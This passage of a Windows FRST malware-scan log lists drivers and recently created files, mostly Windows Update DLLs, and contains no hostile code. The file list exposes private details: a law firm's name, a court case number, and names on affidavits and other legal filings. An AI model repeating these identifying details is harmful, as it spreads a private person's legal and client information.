R3 VBAudioHFVAIOMME; C:\Windows\system32\DRIVERS\vbaudio_hfvaio64_win7.sys [33512 2015-12-20] (Windows ® Win 7 DDK provider)
R3 VBAudioVACMME; C:\Windows\system32\DRIVERS\vbaudio_cable64_win7.sys [41192 2015-12-20] (Windows ® Win 7 DDK provider)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-06-23 10:06 - 2016-06-23 10:08 - 00000000 ____D C:\FRST
2016-06-23 10:06 - 2016-06-23 10:07 - 00074565 _____ C:\Users\mkt\Downloads\FRST.txt
2016-06-23 10:06 - 2016-06-23 10:07 - 00050886 _____ C:\Users\mkt\Downloads\Addition.txt
2016-06-23 10:06 - 2016-06-23 10:06 - 02387456 _____ (Farbar) C:\Users\mkt\Downloads\FRST64.exe
2016-06-23 09:58 - 2016-06-23 09:58 - 00000000 ____D C:\WINDOWS\LastGood
2016-06-23 08:52 - 2016-06-23 08:52 - 00000000 ___HD C:\OneDriveTemp
2016-06-22 09:09 - 2016-06-22 09:09 - 11374528 _____ (VS Revo Group ) C:\Users\mkt\Downloads\RevoUninProSetup.exe
2016-06-22 09:09 - 2016-06-22 09:09 - 00000000 ____D C:\Users\mkt\AppData\Local\VS Revo Group
2016-06-22 09:09 - 2016-06-22 09:09 - 00000000 ____D C:\ProgramData\VS Revo Group
2016-06-22 09:09 - 2016-06-22 09:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller Pro
2016-06-22 09:09 - 2016-06-22 09:09 - 00000000 ____D C:\Program Files\VS Revo Group
2016-06-22 09:09 - 2009-12-30 11:21 - 00031800 _____ (VS Revo Group) C:\WINDOWS\system32\Drivers\revoflt.sys
2016-06-21 17:33 - 2016-06-21 17:33 - 00112132 _____ C:\Users\mkt\Downloads\160615-reply brief Rule 12 motion MKT.pdf
2016-06-21 17:32 - 2016-06-21 17:32 - 00090373 _____ C:\Users\mkt\Downloads\160620-reply memo of law dissolve TRO-MKT.pdf
2016-06-21 16:27 - 2016-06-21 16:27 - 00087028 _____ C:\Users\mkt\Downloads\Scan_2016_06_21_14_02_20_517.pdf
2016-06-20 17:00 - 2016-06-20 17:00 - 00049739 _____ C:\Users\mkt\Documents\med one.pdf
2016-06-20 13:43 - 2016-06-20 13:43 - 00054873 _____ C:\Users\mkt\Downloads\Memorandum in Opposition to Motion to Dismiss (6.14.16) (1).pdf
2016-06-20 13:42 - 2016-06-20 13:42 - 00520155 _____ C:\Users\mkt\Downloads\Affidavit of BG (6.14.16) (1).pdf
2016-06-20 13:42 - 2016-06-20 13:42 - 00266999 _____ C:\Users\mkt\Downloads\Affidvit of M. Plitman (6.14.16) (1).pdf
2016-06-20 13:42 - 2016-06-20 13:42 - 00008109 _____ C:\Users\mkt\Downloads\Proposed Order (6.14.16) (2).pdf
2016-06-20 13:41 - 2016-06-20 13:41 - 00008109 _____ C:\Users\mkt\Downloads\Proposed Order (6.14.16) (1).pdf
2016-06-20 10:03 - 2016-06-20 10:03 - 00266999 _____ C:\Users\mkt\Downloads\Affidvit of M. Plitman (6.14.16).pdf
2016-06-20 10:03 - 2016-06-20 10:03 - 00054873 _____ C:\Users\mkt\Downloads\Memorandum in Opposition to Motion to Dismiss (6.14.16).pdf
2016-06-20 10:02 - 2016-06-20 10:02 - 00520155 _____ C:\Users\mkt\Downloads\Affidavit of BG (6.14.16).pdf
2016-06-20 10:02 - 2016-06-20 10:02 - 00008109 _____ C:\Users\mkt\Downloads\Proposed Order (6.14.16).pdf
2016-06-16 13:25 - 2016-06-16 13:25 - 00055732 _____ C:\Users\mkt\Downloads\160616 Rule 41 Ntc of Dismissal by Pl.pdf
2016-06-15 16:15 - 2016-06-15 16:15 - 00351436 _____ C:\Users\mkt\Downloads\27-CV-15-14310  Def Proposed FOF-signed.pdf
2016-06-15 16:15 - 2016-06-15 16:15 - 00351436 _____ C:\Users\mkt\Downloads\27-CV-15-14310  Def Proposed FOF-signed (1).pdf
2016-06-15 16:09 - 2016-06-15 16:17 - 00000000 ___RD C:\Users\mkt\OneDrive - MKT Law, PLC
2016-06-15 16:09 - 2016-06-15 16:09 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2016-06-15 01:12 - 2016-05-28 01:13 - 01401024 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-06-15 01:12 - 2016-05-28 01:13 - 00290496 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-06-15 01:12 - 2016-05-28 01:13 - 00046784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-06-15 01:12 - 2016-05-28 00:22 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-06-15 01:12 - 2016-05-28 00:08 - 00693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-06-15 01:12 - 2016-05-28 00:07 - 03675512 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-06-15 01:12 - 2016-05-28 00:07 - 02921880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-06-15 01:12 - 2016-05-28 00:07 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-06-15 01:12 - 2016-05-28 00:07 - 00808288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-06-15 01:12 - 2016-05-28 00:07 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-06-15 01:12 - 2016-05-27 23:58 - 00379232 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-06-15 01:12 - 2016-05-27 23:57 - 02548944 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2016-06-15 01:12 - 2016-05-27 23:57 - 02195632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2016-06-15 01:12 - 2016-05-27 23:57 - 01594416 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-06-15 01:12 - 2016-05-27 23:57 - 01372312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-06-15 01:12 - 2016-05-27 23:57 - 00649792 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-06-15 01:12 - 2016-05-27 23:57 - 00636304 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-06-15 01:12 - 2016-05-27 23:57 - 00546456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-06-15 01:12 - 2016-05-27 23:57 - 00316256 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-06-15 01:12 - 2016-05-27 23:35 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdlrecover.exe
2016-06-15 01:12 - 2016-05-27 23:35 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-06-15 01:12 - 2016-05-27 23:35 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsdport.sys
2016-06-15 01:12 - 2016-05-27 23:31 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdlrecover.exe
2016-06-15 01:12 - 2016-05-27 23:31 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-06-15 01:12 - 2016-05-27 23:29 - 22379008 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-06-15 01:12 - 2016-05-27 23:29 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-06-15 01:12 - 2016-05-27 23:28 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-06-15 01:12 - 2016-05-27 23:27 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosHostClient.dll
2016-06-15 01:12 - 2016-05-27 23:27 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapsupdatetask.dll
2016-06-15 01:12 - 2016-05-27 23:26 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-06-15 01:12 - 2016-05-27 23:26 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-06-15 01:12 - 2016-05-27 23:25 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-06-15 01:12 - 2016-05-27 23:24 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-06-15 01:12 - 2016-05-27 23:24 - 00072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-06-15 01:12 - 2016-05-27 23:22 - 00269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-06-15 01:12 - 2016-05-27 23:22 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-06-15 01:12 - 2016-05-27 23:22 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-06-15 01:12 - 2016-05-27 23:19 - 24605696 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-06-15 01:12 - 2016-05-27 23:19 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-06-15 01:12 - 2016-05-27 23:18 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-06-15 01:12 - 2016-05-27 23:18 - 07977472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-06-15 01:12 - 2016-05-27 23:18 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpprefcl.dll
2016-06-15 01:12 - 2016-05-27 23:18 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-06-15 01:12 - 2016-05-27 23:18 - 00380416 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2016-06-15 01:12 - 2016-05-27 23:17 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-06-15 01:12 - 2016-05-27 23:17 - 00963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\iphlpsvc.dll
2016-06-15 01:12 - 2016-05-27 23:17 - 00630784 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-06-15 01:12 - 2016-05-27 23:16 - 19344384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-06-15 01:12 - 2016-05-27 23:16 - 00592896 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-06-15 01:12 - 2016-05-27 23:16 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-06-15 01:12 - 2016-05-27 23:15 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-06-15 01:12 - 2016-05-27 23:15 - 00853504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-06-15 01:12 - 2016-05-27 23:15 - 00794624 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-06-15 01:12 - 2016-05-27 23:15 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-06-15 01:12 - 2016-05-27 23:14 - 18674176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-06-15 01:12 - 2016-05-27 23:14 - 01716736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-06-15 01:12 - 2016-05-27 23:14 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-06-15 01:12 - 2016-05-27 23:14 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-06-15 01:12 - 2016-05-27 23:14 - 00606208 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-06-15 01:12 - 2016-05-27 23:14 - 00499712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-06-15 01:12 - 2016-05-27 23:13 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-06-15 01:12 - 2016-05-27 23:13 - 00939520 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-06-15 01:12 - 2016-05-27 23:12 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-06-15 01:12 - 2016-05-27 23:12 - 00614400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-06-15 01:12 - 2016-05-27 23:11 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-06-15 01:12 - 2016-05-27 23:11 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-06-15 01:12 - 2016-05-27 23:11 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-06-15 01:12 - 2016-05-27 23:11 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-06-15 01:12 - 2016-05-27 23:11 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-06-15 01:12 - 2016-05-27 23:08 - 13385728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-06-15 01:12 - 2016-05-27 23:08 - 06295552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-06-15 01:12 - 2016-05-27 23:06 - 12128256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-06-15 01:12 - 2016-05-27 23:06 - 07200256 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-06-15 01:12 - 2016-05-27 23:06 - 01339904 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-06-15 01:12 - 2016-05-27 23:05 - 03994624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-06-15 01:12 - 2016-05-27 23:05 - 03664896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-06-15 01:12 - 2016-05-27 23:05 - 02582016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-06-15 01:12 - 2016-05-27 23:05 - 01797120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-06-15 01:12 - 2016-05-27 23:04 - 06973952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-06-15 01:12 - 2016-05-27 23:03 - 05323776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-06-15 01:12 - 2016-05-27 23:03 - 05205504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-06-15 01:12 - 2016-05-27 23:03 - 02609664 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-06-15 01:12 - 2016-05-27 23:03 - 01185280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LocationFramework.dll
2016-06-15 01:12 - 2016-05-27 23:02 - 03590144 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-06-15 01:12 - 2016-05-27 23:02 - 02061824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-06-15 01:12 - 2016-05-27 23:02 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFramework.dll
2016-06-15 01:12 - 2016-05-27 23:01 - 01799680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-06-15 01:12 - 2016-05-27 23:01 - 01582080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-06-15 01:12 - 2016-05-27 23:00 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-06-15 01:12 - 2016-05-27 23:00 - 03585536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-06-15 01:12 - 2016-05-27 23:00 - 02635776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-06-15 01:12 - 2016-05-27 23:00 - 02168320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-06-15 01:12 - 2016-05-27 23:00 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-06-15 01:12 - 2016-05-27 22:58 - 07832576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-06-15 01:12 - 2016-05-27 22:58 - 04896256 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-06-15 01:12 - 2016-05-27 22:58 - 02066432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-06-15 01:12 - 2016-05-27 22:58 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-06-15 01:12 - 2016-05-27 22:57 - 02281472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-06-15 01:11 - 2016-05-28 01:13 - 01184960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-06-15 01:11 - 2016-05-28 01:13 - 00514752 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-06-15 01:11 - 2016-05-28 01:13 - 00092352 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-06-15 01:11 - 2016-05-28 00:25 - 04268880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupapi.dll
2016-06-15 01:11 - 2016-05-28 00:23 - 00388384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll
2016-06-15 01:11 - 2016-05-28 00:23 - 00312160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswsock.dll
2016-06-15 01:11 - 2016-05-28 00:22 - 04387680 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupapi.dll
2016-06-15 01:11 - 2016-05-28 00:22 - 00428896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-06-15 01:11 - 2016-05-28 00:22 - 00211296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-06-15 01:11 - 2016-05-28 00:22 - 00118624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-06-15 01:11 - 2016-05-28 00:20 - 00430312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-06-15 01:11 - 2016-05-28 00:18 - 00357216 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswsock.dll
2016-06-15 01:11 - 2016-05-28 00:16 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-06-15 01:11 - 2016-05-28 00:09 - 00501600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-06-15 01:11 - 2016-05-28 00:09 - 00170848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.exe
2016-06-15 01:11 - 2016-05-28 00:09 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-06-15 01:11 - 2016-05-28 00:08 - 00258912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufx01000.sys
2016-06-15 01:11 - 2016-05-28 00:08 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-06-15 01:11 - 2016-05-28 00:07 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-06-15 01:11 - 2016-05-28 00:07 - 00331616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-06-15 01:11 - 2016-05-28 00:06 - 22561256 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-06-15 01:11 - 2016-05-28 00:06 - 04074160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-06-15 01:11 - 2016-05-28 00:06 - 00730344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-06-15 01:11 - 2016-05-28 00:06 - 00303216 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-06-15 01:11 - 2016-05-28 00:06 - 00254656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-06-15 01:11 - 2016-05-28 00:05 - 04515264 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-06-15 01:11 - 2016-05-28 00:04 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-06-15 01:11 - 2016-05-28 00:04 - 00431296 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2016-06-15 01:11 - 2016-05-28 00:04 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2016-06-15 01:11 - 2016-05-28 00:04 - 00161632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-06-15 01:11 - 2016-05-28 00:04 - 00111064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptsslp.dll
2016-06-15 01:11 - 2016-05-28 00:04 - 00097096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncryptsslp.dll
2016-06-15 01:11 - 2016-05-28 00:03 - 00131248 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpapi.dll
2016-06-15 01:11 - 2016-05-27 23:58 - 01996640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-06-15 01:11 - 2016-05-27 23:57 - 00577376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-06-15 01:11 - 2016-05-27 23:57 - 00521664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-06-15 01:11 - 2016-05-27 23:31 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-06-15 01:11 - 2016-05-27 23:29 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARP12Debug.dll
2016-06-15 01:11 - 2016-05-27 23:29 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\adhsvc.dll
2016-06-15 01:11 - 2016-05-27 23:29 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxp.dll
2016-06-15 01:11 - 2016-05-27 23:28 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-06-15 01:11 - 2016-05-27 23:28 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\FwRemoteSvr.dll
2016-06-15 01:11 - 2016-05-27 23:26 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-06-15 01:11 - 2016-05-27 23:26 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2016-06-15 01:11 - 2016-05-27 23:26 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2016-06-15 01:11 - 2016-05-27 23:25 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-06-15 01:11 - 2016-05-27 23:25 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSD3DWARPDebug.dll
2016-06-15 01:11 - 2016-05-27 23:25 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARP12Debug.dll
2016-06-15 01:11 - 2016-05-27 23:25 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpscript.dll
2016-06-15 01:11 - 2016-05-27 23:24 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-06-15 01:11 - 2016-05-27 23:24 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Ndu.sys
2016-06-15 01:11 - 2016-05-27 23:24 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-06-15 01:11 - 2016-05-27 23:24 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-06-15 01:11 - 2016-05-27 23:24 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcsvc6.dll
2016-06-15 01:11 - 2016-05-27 23:24 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FwRemoteSvr.dll
2016-06-15 01:11 - 2016-05-27 23:23 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-06-15 01:11 - 2016-05-27 23:23 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcsvc.dll
2016-06-15 01:11 - 2016-05-27 23:22 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-06-15 01:11 - 2016-05-27 23:22 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-06-15 01:11 - 2016-05-27 23:22 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netbt.sys
2016-06-15 01:11 - 2016-05-27 23:22 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2016-06-15 01:11 - 2016-05-27 23:22 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-06-15 01:11 - 2016-05-27 23:22 - 00079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
2016-06-15 01:11 - 2016-05-27 23:21 - 00550912 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-06-15 01:11 - 2016-05-27 23:21 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\BrokerLib.dll
2016-06-15 01:11 - 2016-05-27 23:21 - 00207360 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-06-15 01:11 - 2016-05-27 23:21 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-06-15 01:11 - 2016-05-27 23:21 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VSD3DWARPDebug.dll
2016-06-15 01:11 - 2016-05-27 23:21 - 00042496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpscript.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00511488 _____ (Microsoft Corporation) C:\WINDOWS\system32\newdev.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\polstore.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GnssAdapter.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Privacy.dll
2016-06-15 01:11 - 2016-05-27 23:20 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcsvc6.dll
2016-06-15 01:11 - 2016-05-27 23:19 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-06-15 01:11 - 2016-05-27 23:19 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-06-15 01:11 - 2016-05-27 23:19 - 00355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2016-06-15 01:11 - 2016-05-27 23:19 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcsvc.dll
2016-06-15 01:11 - 2016-05-27 23:18 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2016-06-15 01:11 - 2016-05-27 23:18 - 00591360 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll
2016-06-15 01:11 - 2016-05-27 23:18 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPSECSVC.DLL
2016-06-15 01:11 - 2016-05-27 23:18 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-06-15 01:11 - 2016-05-27 23:17 - 00485888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\newdev.dll
